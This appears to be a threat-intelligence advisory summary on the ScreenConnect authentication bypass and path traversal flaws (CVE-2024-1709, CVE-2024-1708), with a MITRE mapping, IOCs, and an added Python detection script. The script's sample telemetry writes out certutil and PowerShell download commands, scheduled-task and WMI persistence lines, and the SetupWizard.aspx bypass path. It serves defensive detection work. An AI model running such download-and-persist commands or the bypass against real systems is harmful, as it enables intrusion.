Two critical ScreenConnect vulnerabilities (CVE-2024-1709 and CVE-2024-1708) allowed authentication bypass and path traversal, enabling unauthorized access and potential RCE. The advisory details exploitation trends (web extensions deploying a webshell, certutil/PowerShell payload delivery, and Fin8-related activity) and provides IOCs, patch guidance, and defensive recommendations. #ScreenConnect #CVE-2024-1709 #CVE-2024-1708 #Fin8 #Sardonic #BYOVD
Keypoints
- ConnectWise released security patches on Feb 19, 2024 for ScreenConnect to fix CVE-2024-1709 (authentication bypass) and CVE-2024-1708 (path traversal).
- Attackers focused on the ScreenConnect server component first, using extensions to deploy webshells rather than compromising clients directly.
- Payload delivery relies on certutil and PowerShell download-and-execute chains; follow-on stages include WMI-based persistence and DLL sideloading.
- Execution Flow 1 ties activity to Fin8, including data exfiltration via Restic and attempted Rust ransomware (Qilin) deployment on victims.
- Multiple execution flows (2–8) describe various client-side techniques: DLL sideloading, WMI-based persistence, scheduled tasks, script-based downloaders, miners, and staged payloads.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The vulnerability on the ScreenConnect server allowed authentication bypass and access to setup interfaces (e.g., “append a string after /SetupWizard.aspx to gain access to the setup wizard on a previously configured system.”)
- [T1574.002] DLL Side-Loading – Attackers use extensions to deploy a webshell and load additional payloads via sideloaded DLLs
- [T1105] Ingress Tool Transfer – Extensions/downloads use certutil to fetch and run payloads from remote servers (e.g., “cmd.exe /c certutil -urlcache -f …”)
- [T1059.001] PowerShell – PowerShell-based payloads/downloads are used (e.g., “This PowerShell command uses the Invoke-WebRequest cmdlet (alias wget) to download three files from specified URLs…”)
- [T1053.005] Scheduled Task – Persistence via SCHTASKS to execute a dropped binary (e.g., “SCHTASKS /Create … /TR C:\Windows\Help\Help\SentinelUI.exe …”)
- [T1047] Windows Management Instrumentation – Persistence via a WMI event subscription and a command-line consumer (e.g., “System__Cmr”)
- [T1055] Process Injection – Shellcode injected into wmiprvse.exe to run Sardonic backdoor
- [T1021] Remote Services – Abuse of ScreenConnect’s remote management features to deploy payloads to client machines
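As an added example that is not part of the advisory, the rules below turn the patterns quoted above (the SetupWizard.aspx request, certutil -urlcache, PowerShell wget downloads, the SCHTASKS task under C:\Windows\Help, and the WMI command-line consumer) into detection logic run over constructed sample telemetry; the command lines, the URL host 198.51.100.10 and the task name are made up for the demonstration.

```python
import re

# Constructed sample telemetry (not from the advisory): web-server request
# paths and process command lines shaped like the patterns the page cites.
SAMPLE_EVENTS = [
    {"type": "web", "path": "/SetupWizard.aspx/anything"},
    {"type": "web", "path": "/Login"},
    {"type": "proc", "cmd": "cmd.exe /c certutil -urlcache -f http://198.51.100.10/a.exe C:\\Users\\Public\\a.exe"},
    {"type": "proc", "cmd": "powershell -c wget http://198.51.100.10/x -OutFile C:\\Users\\Public\\x.dll"},
    {"type": "proc", "cmd": "SCHTASKS /Create /SC ONLOGON /TN Updater /TR C:\\Windows\\Help\\Help\\SentinelUI.exe"},
    {"type": "proc", "cmd": "powershell -c Set-WmiInstance -Class CommandLineEventConsumer "
                            "-Namespace root\\subscription -Arguments @{Name='System__Cmr'}"},
    {"type": "proc", "cmd": "notepad.exe C:\\notes.txt"},
]

# (technique id, event type, pattern). Each pattern is one observable from the
# MITRE mapping above; tune the allow-lists to your own environment.
RULES = [
    # Any request to SetupWizard.aspx with extra characters appended is abnormal
    # on a server that has already completed setup (CVE-2024-1709 pattern).
    ("T1190", "web", re.compile(r"^/SetupWizard\.aspx\S+", re.I)),
    # certutil used as a downloader rather than for certificate management.
    ("T1105", "proc", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    # PowerShell fetching remote content via Invoke-WebRequest or its aliases.
    ("T1059.001", "proc", re.compile(r"\bpowershell\b.*\b(Invoke-WebRequest|iwr|wget)\b", re.I)),
    # Scheduled task whose action lives under C:\Windows\Help, an unusual
    # location for executables (SentinelUI.exe in the advisory).
    ("T1053.005", "proc", re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*\\Windows\\Help\\", re.I)),
    # WMI event-subscription persistence: consumer/filter classes or the
    # consumer name quoted in the advisory.
    ("T1047", "proc", re.compile(r"CommandLineEventConsumer|__EventFilter|System__Cmr", re.I)),
]


def match_event(event):
    """Return the list of technique ids whose rule fires on one event."""
    field = "path" if event["type"] == "web" else "cmd"
    return [tid for tid, etype, pat in RULES
            if etype == event["type"] and pat.search(event[field])]


def summarize(events):
    """Count rule hits per technique across a batch of events."""
    counts = {}
    for ev in events:
        for tid in match_event(ev):
            counts[tid] = counts.get(tid, 0) + 1
    return counts


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(match_event(ev), ev.get("path") or ev["cmd"][:60])
    print(summarize(SAMPLE_EVENTS))
```

The SetupWizard.aspx rule is the high-value one for the server side: after initial configuration that endpoint should see no traffic at all, so even a single hit warrants a look at the server's user store and extensions directory.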
Indicators of Compromise
- [IP Address] C2 hosting and infrastructure – 185.232.92[.]32, 124.223.62[.]233, 185.232.92[.]48, 173.44.141[.]126
- [MD5] File hashes associated with payloads – f052b0a702854a601741e7034d75d883, cff3433c3eff1f20f883ef7d8c662a1a, and 2 more hashes
- [File Name] Key payloads and components – ScreenConnectUpdater.exe, rt.js, and 2 more
- [File Name] Additional artifacts – SentinelUI.exe, SentinelAgentCore.dll, and 2 more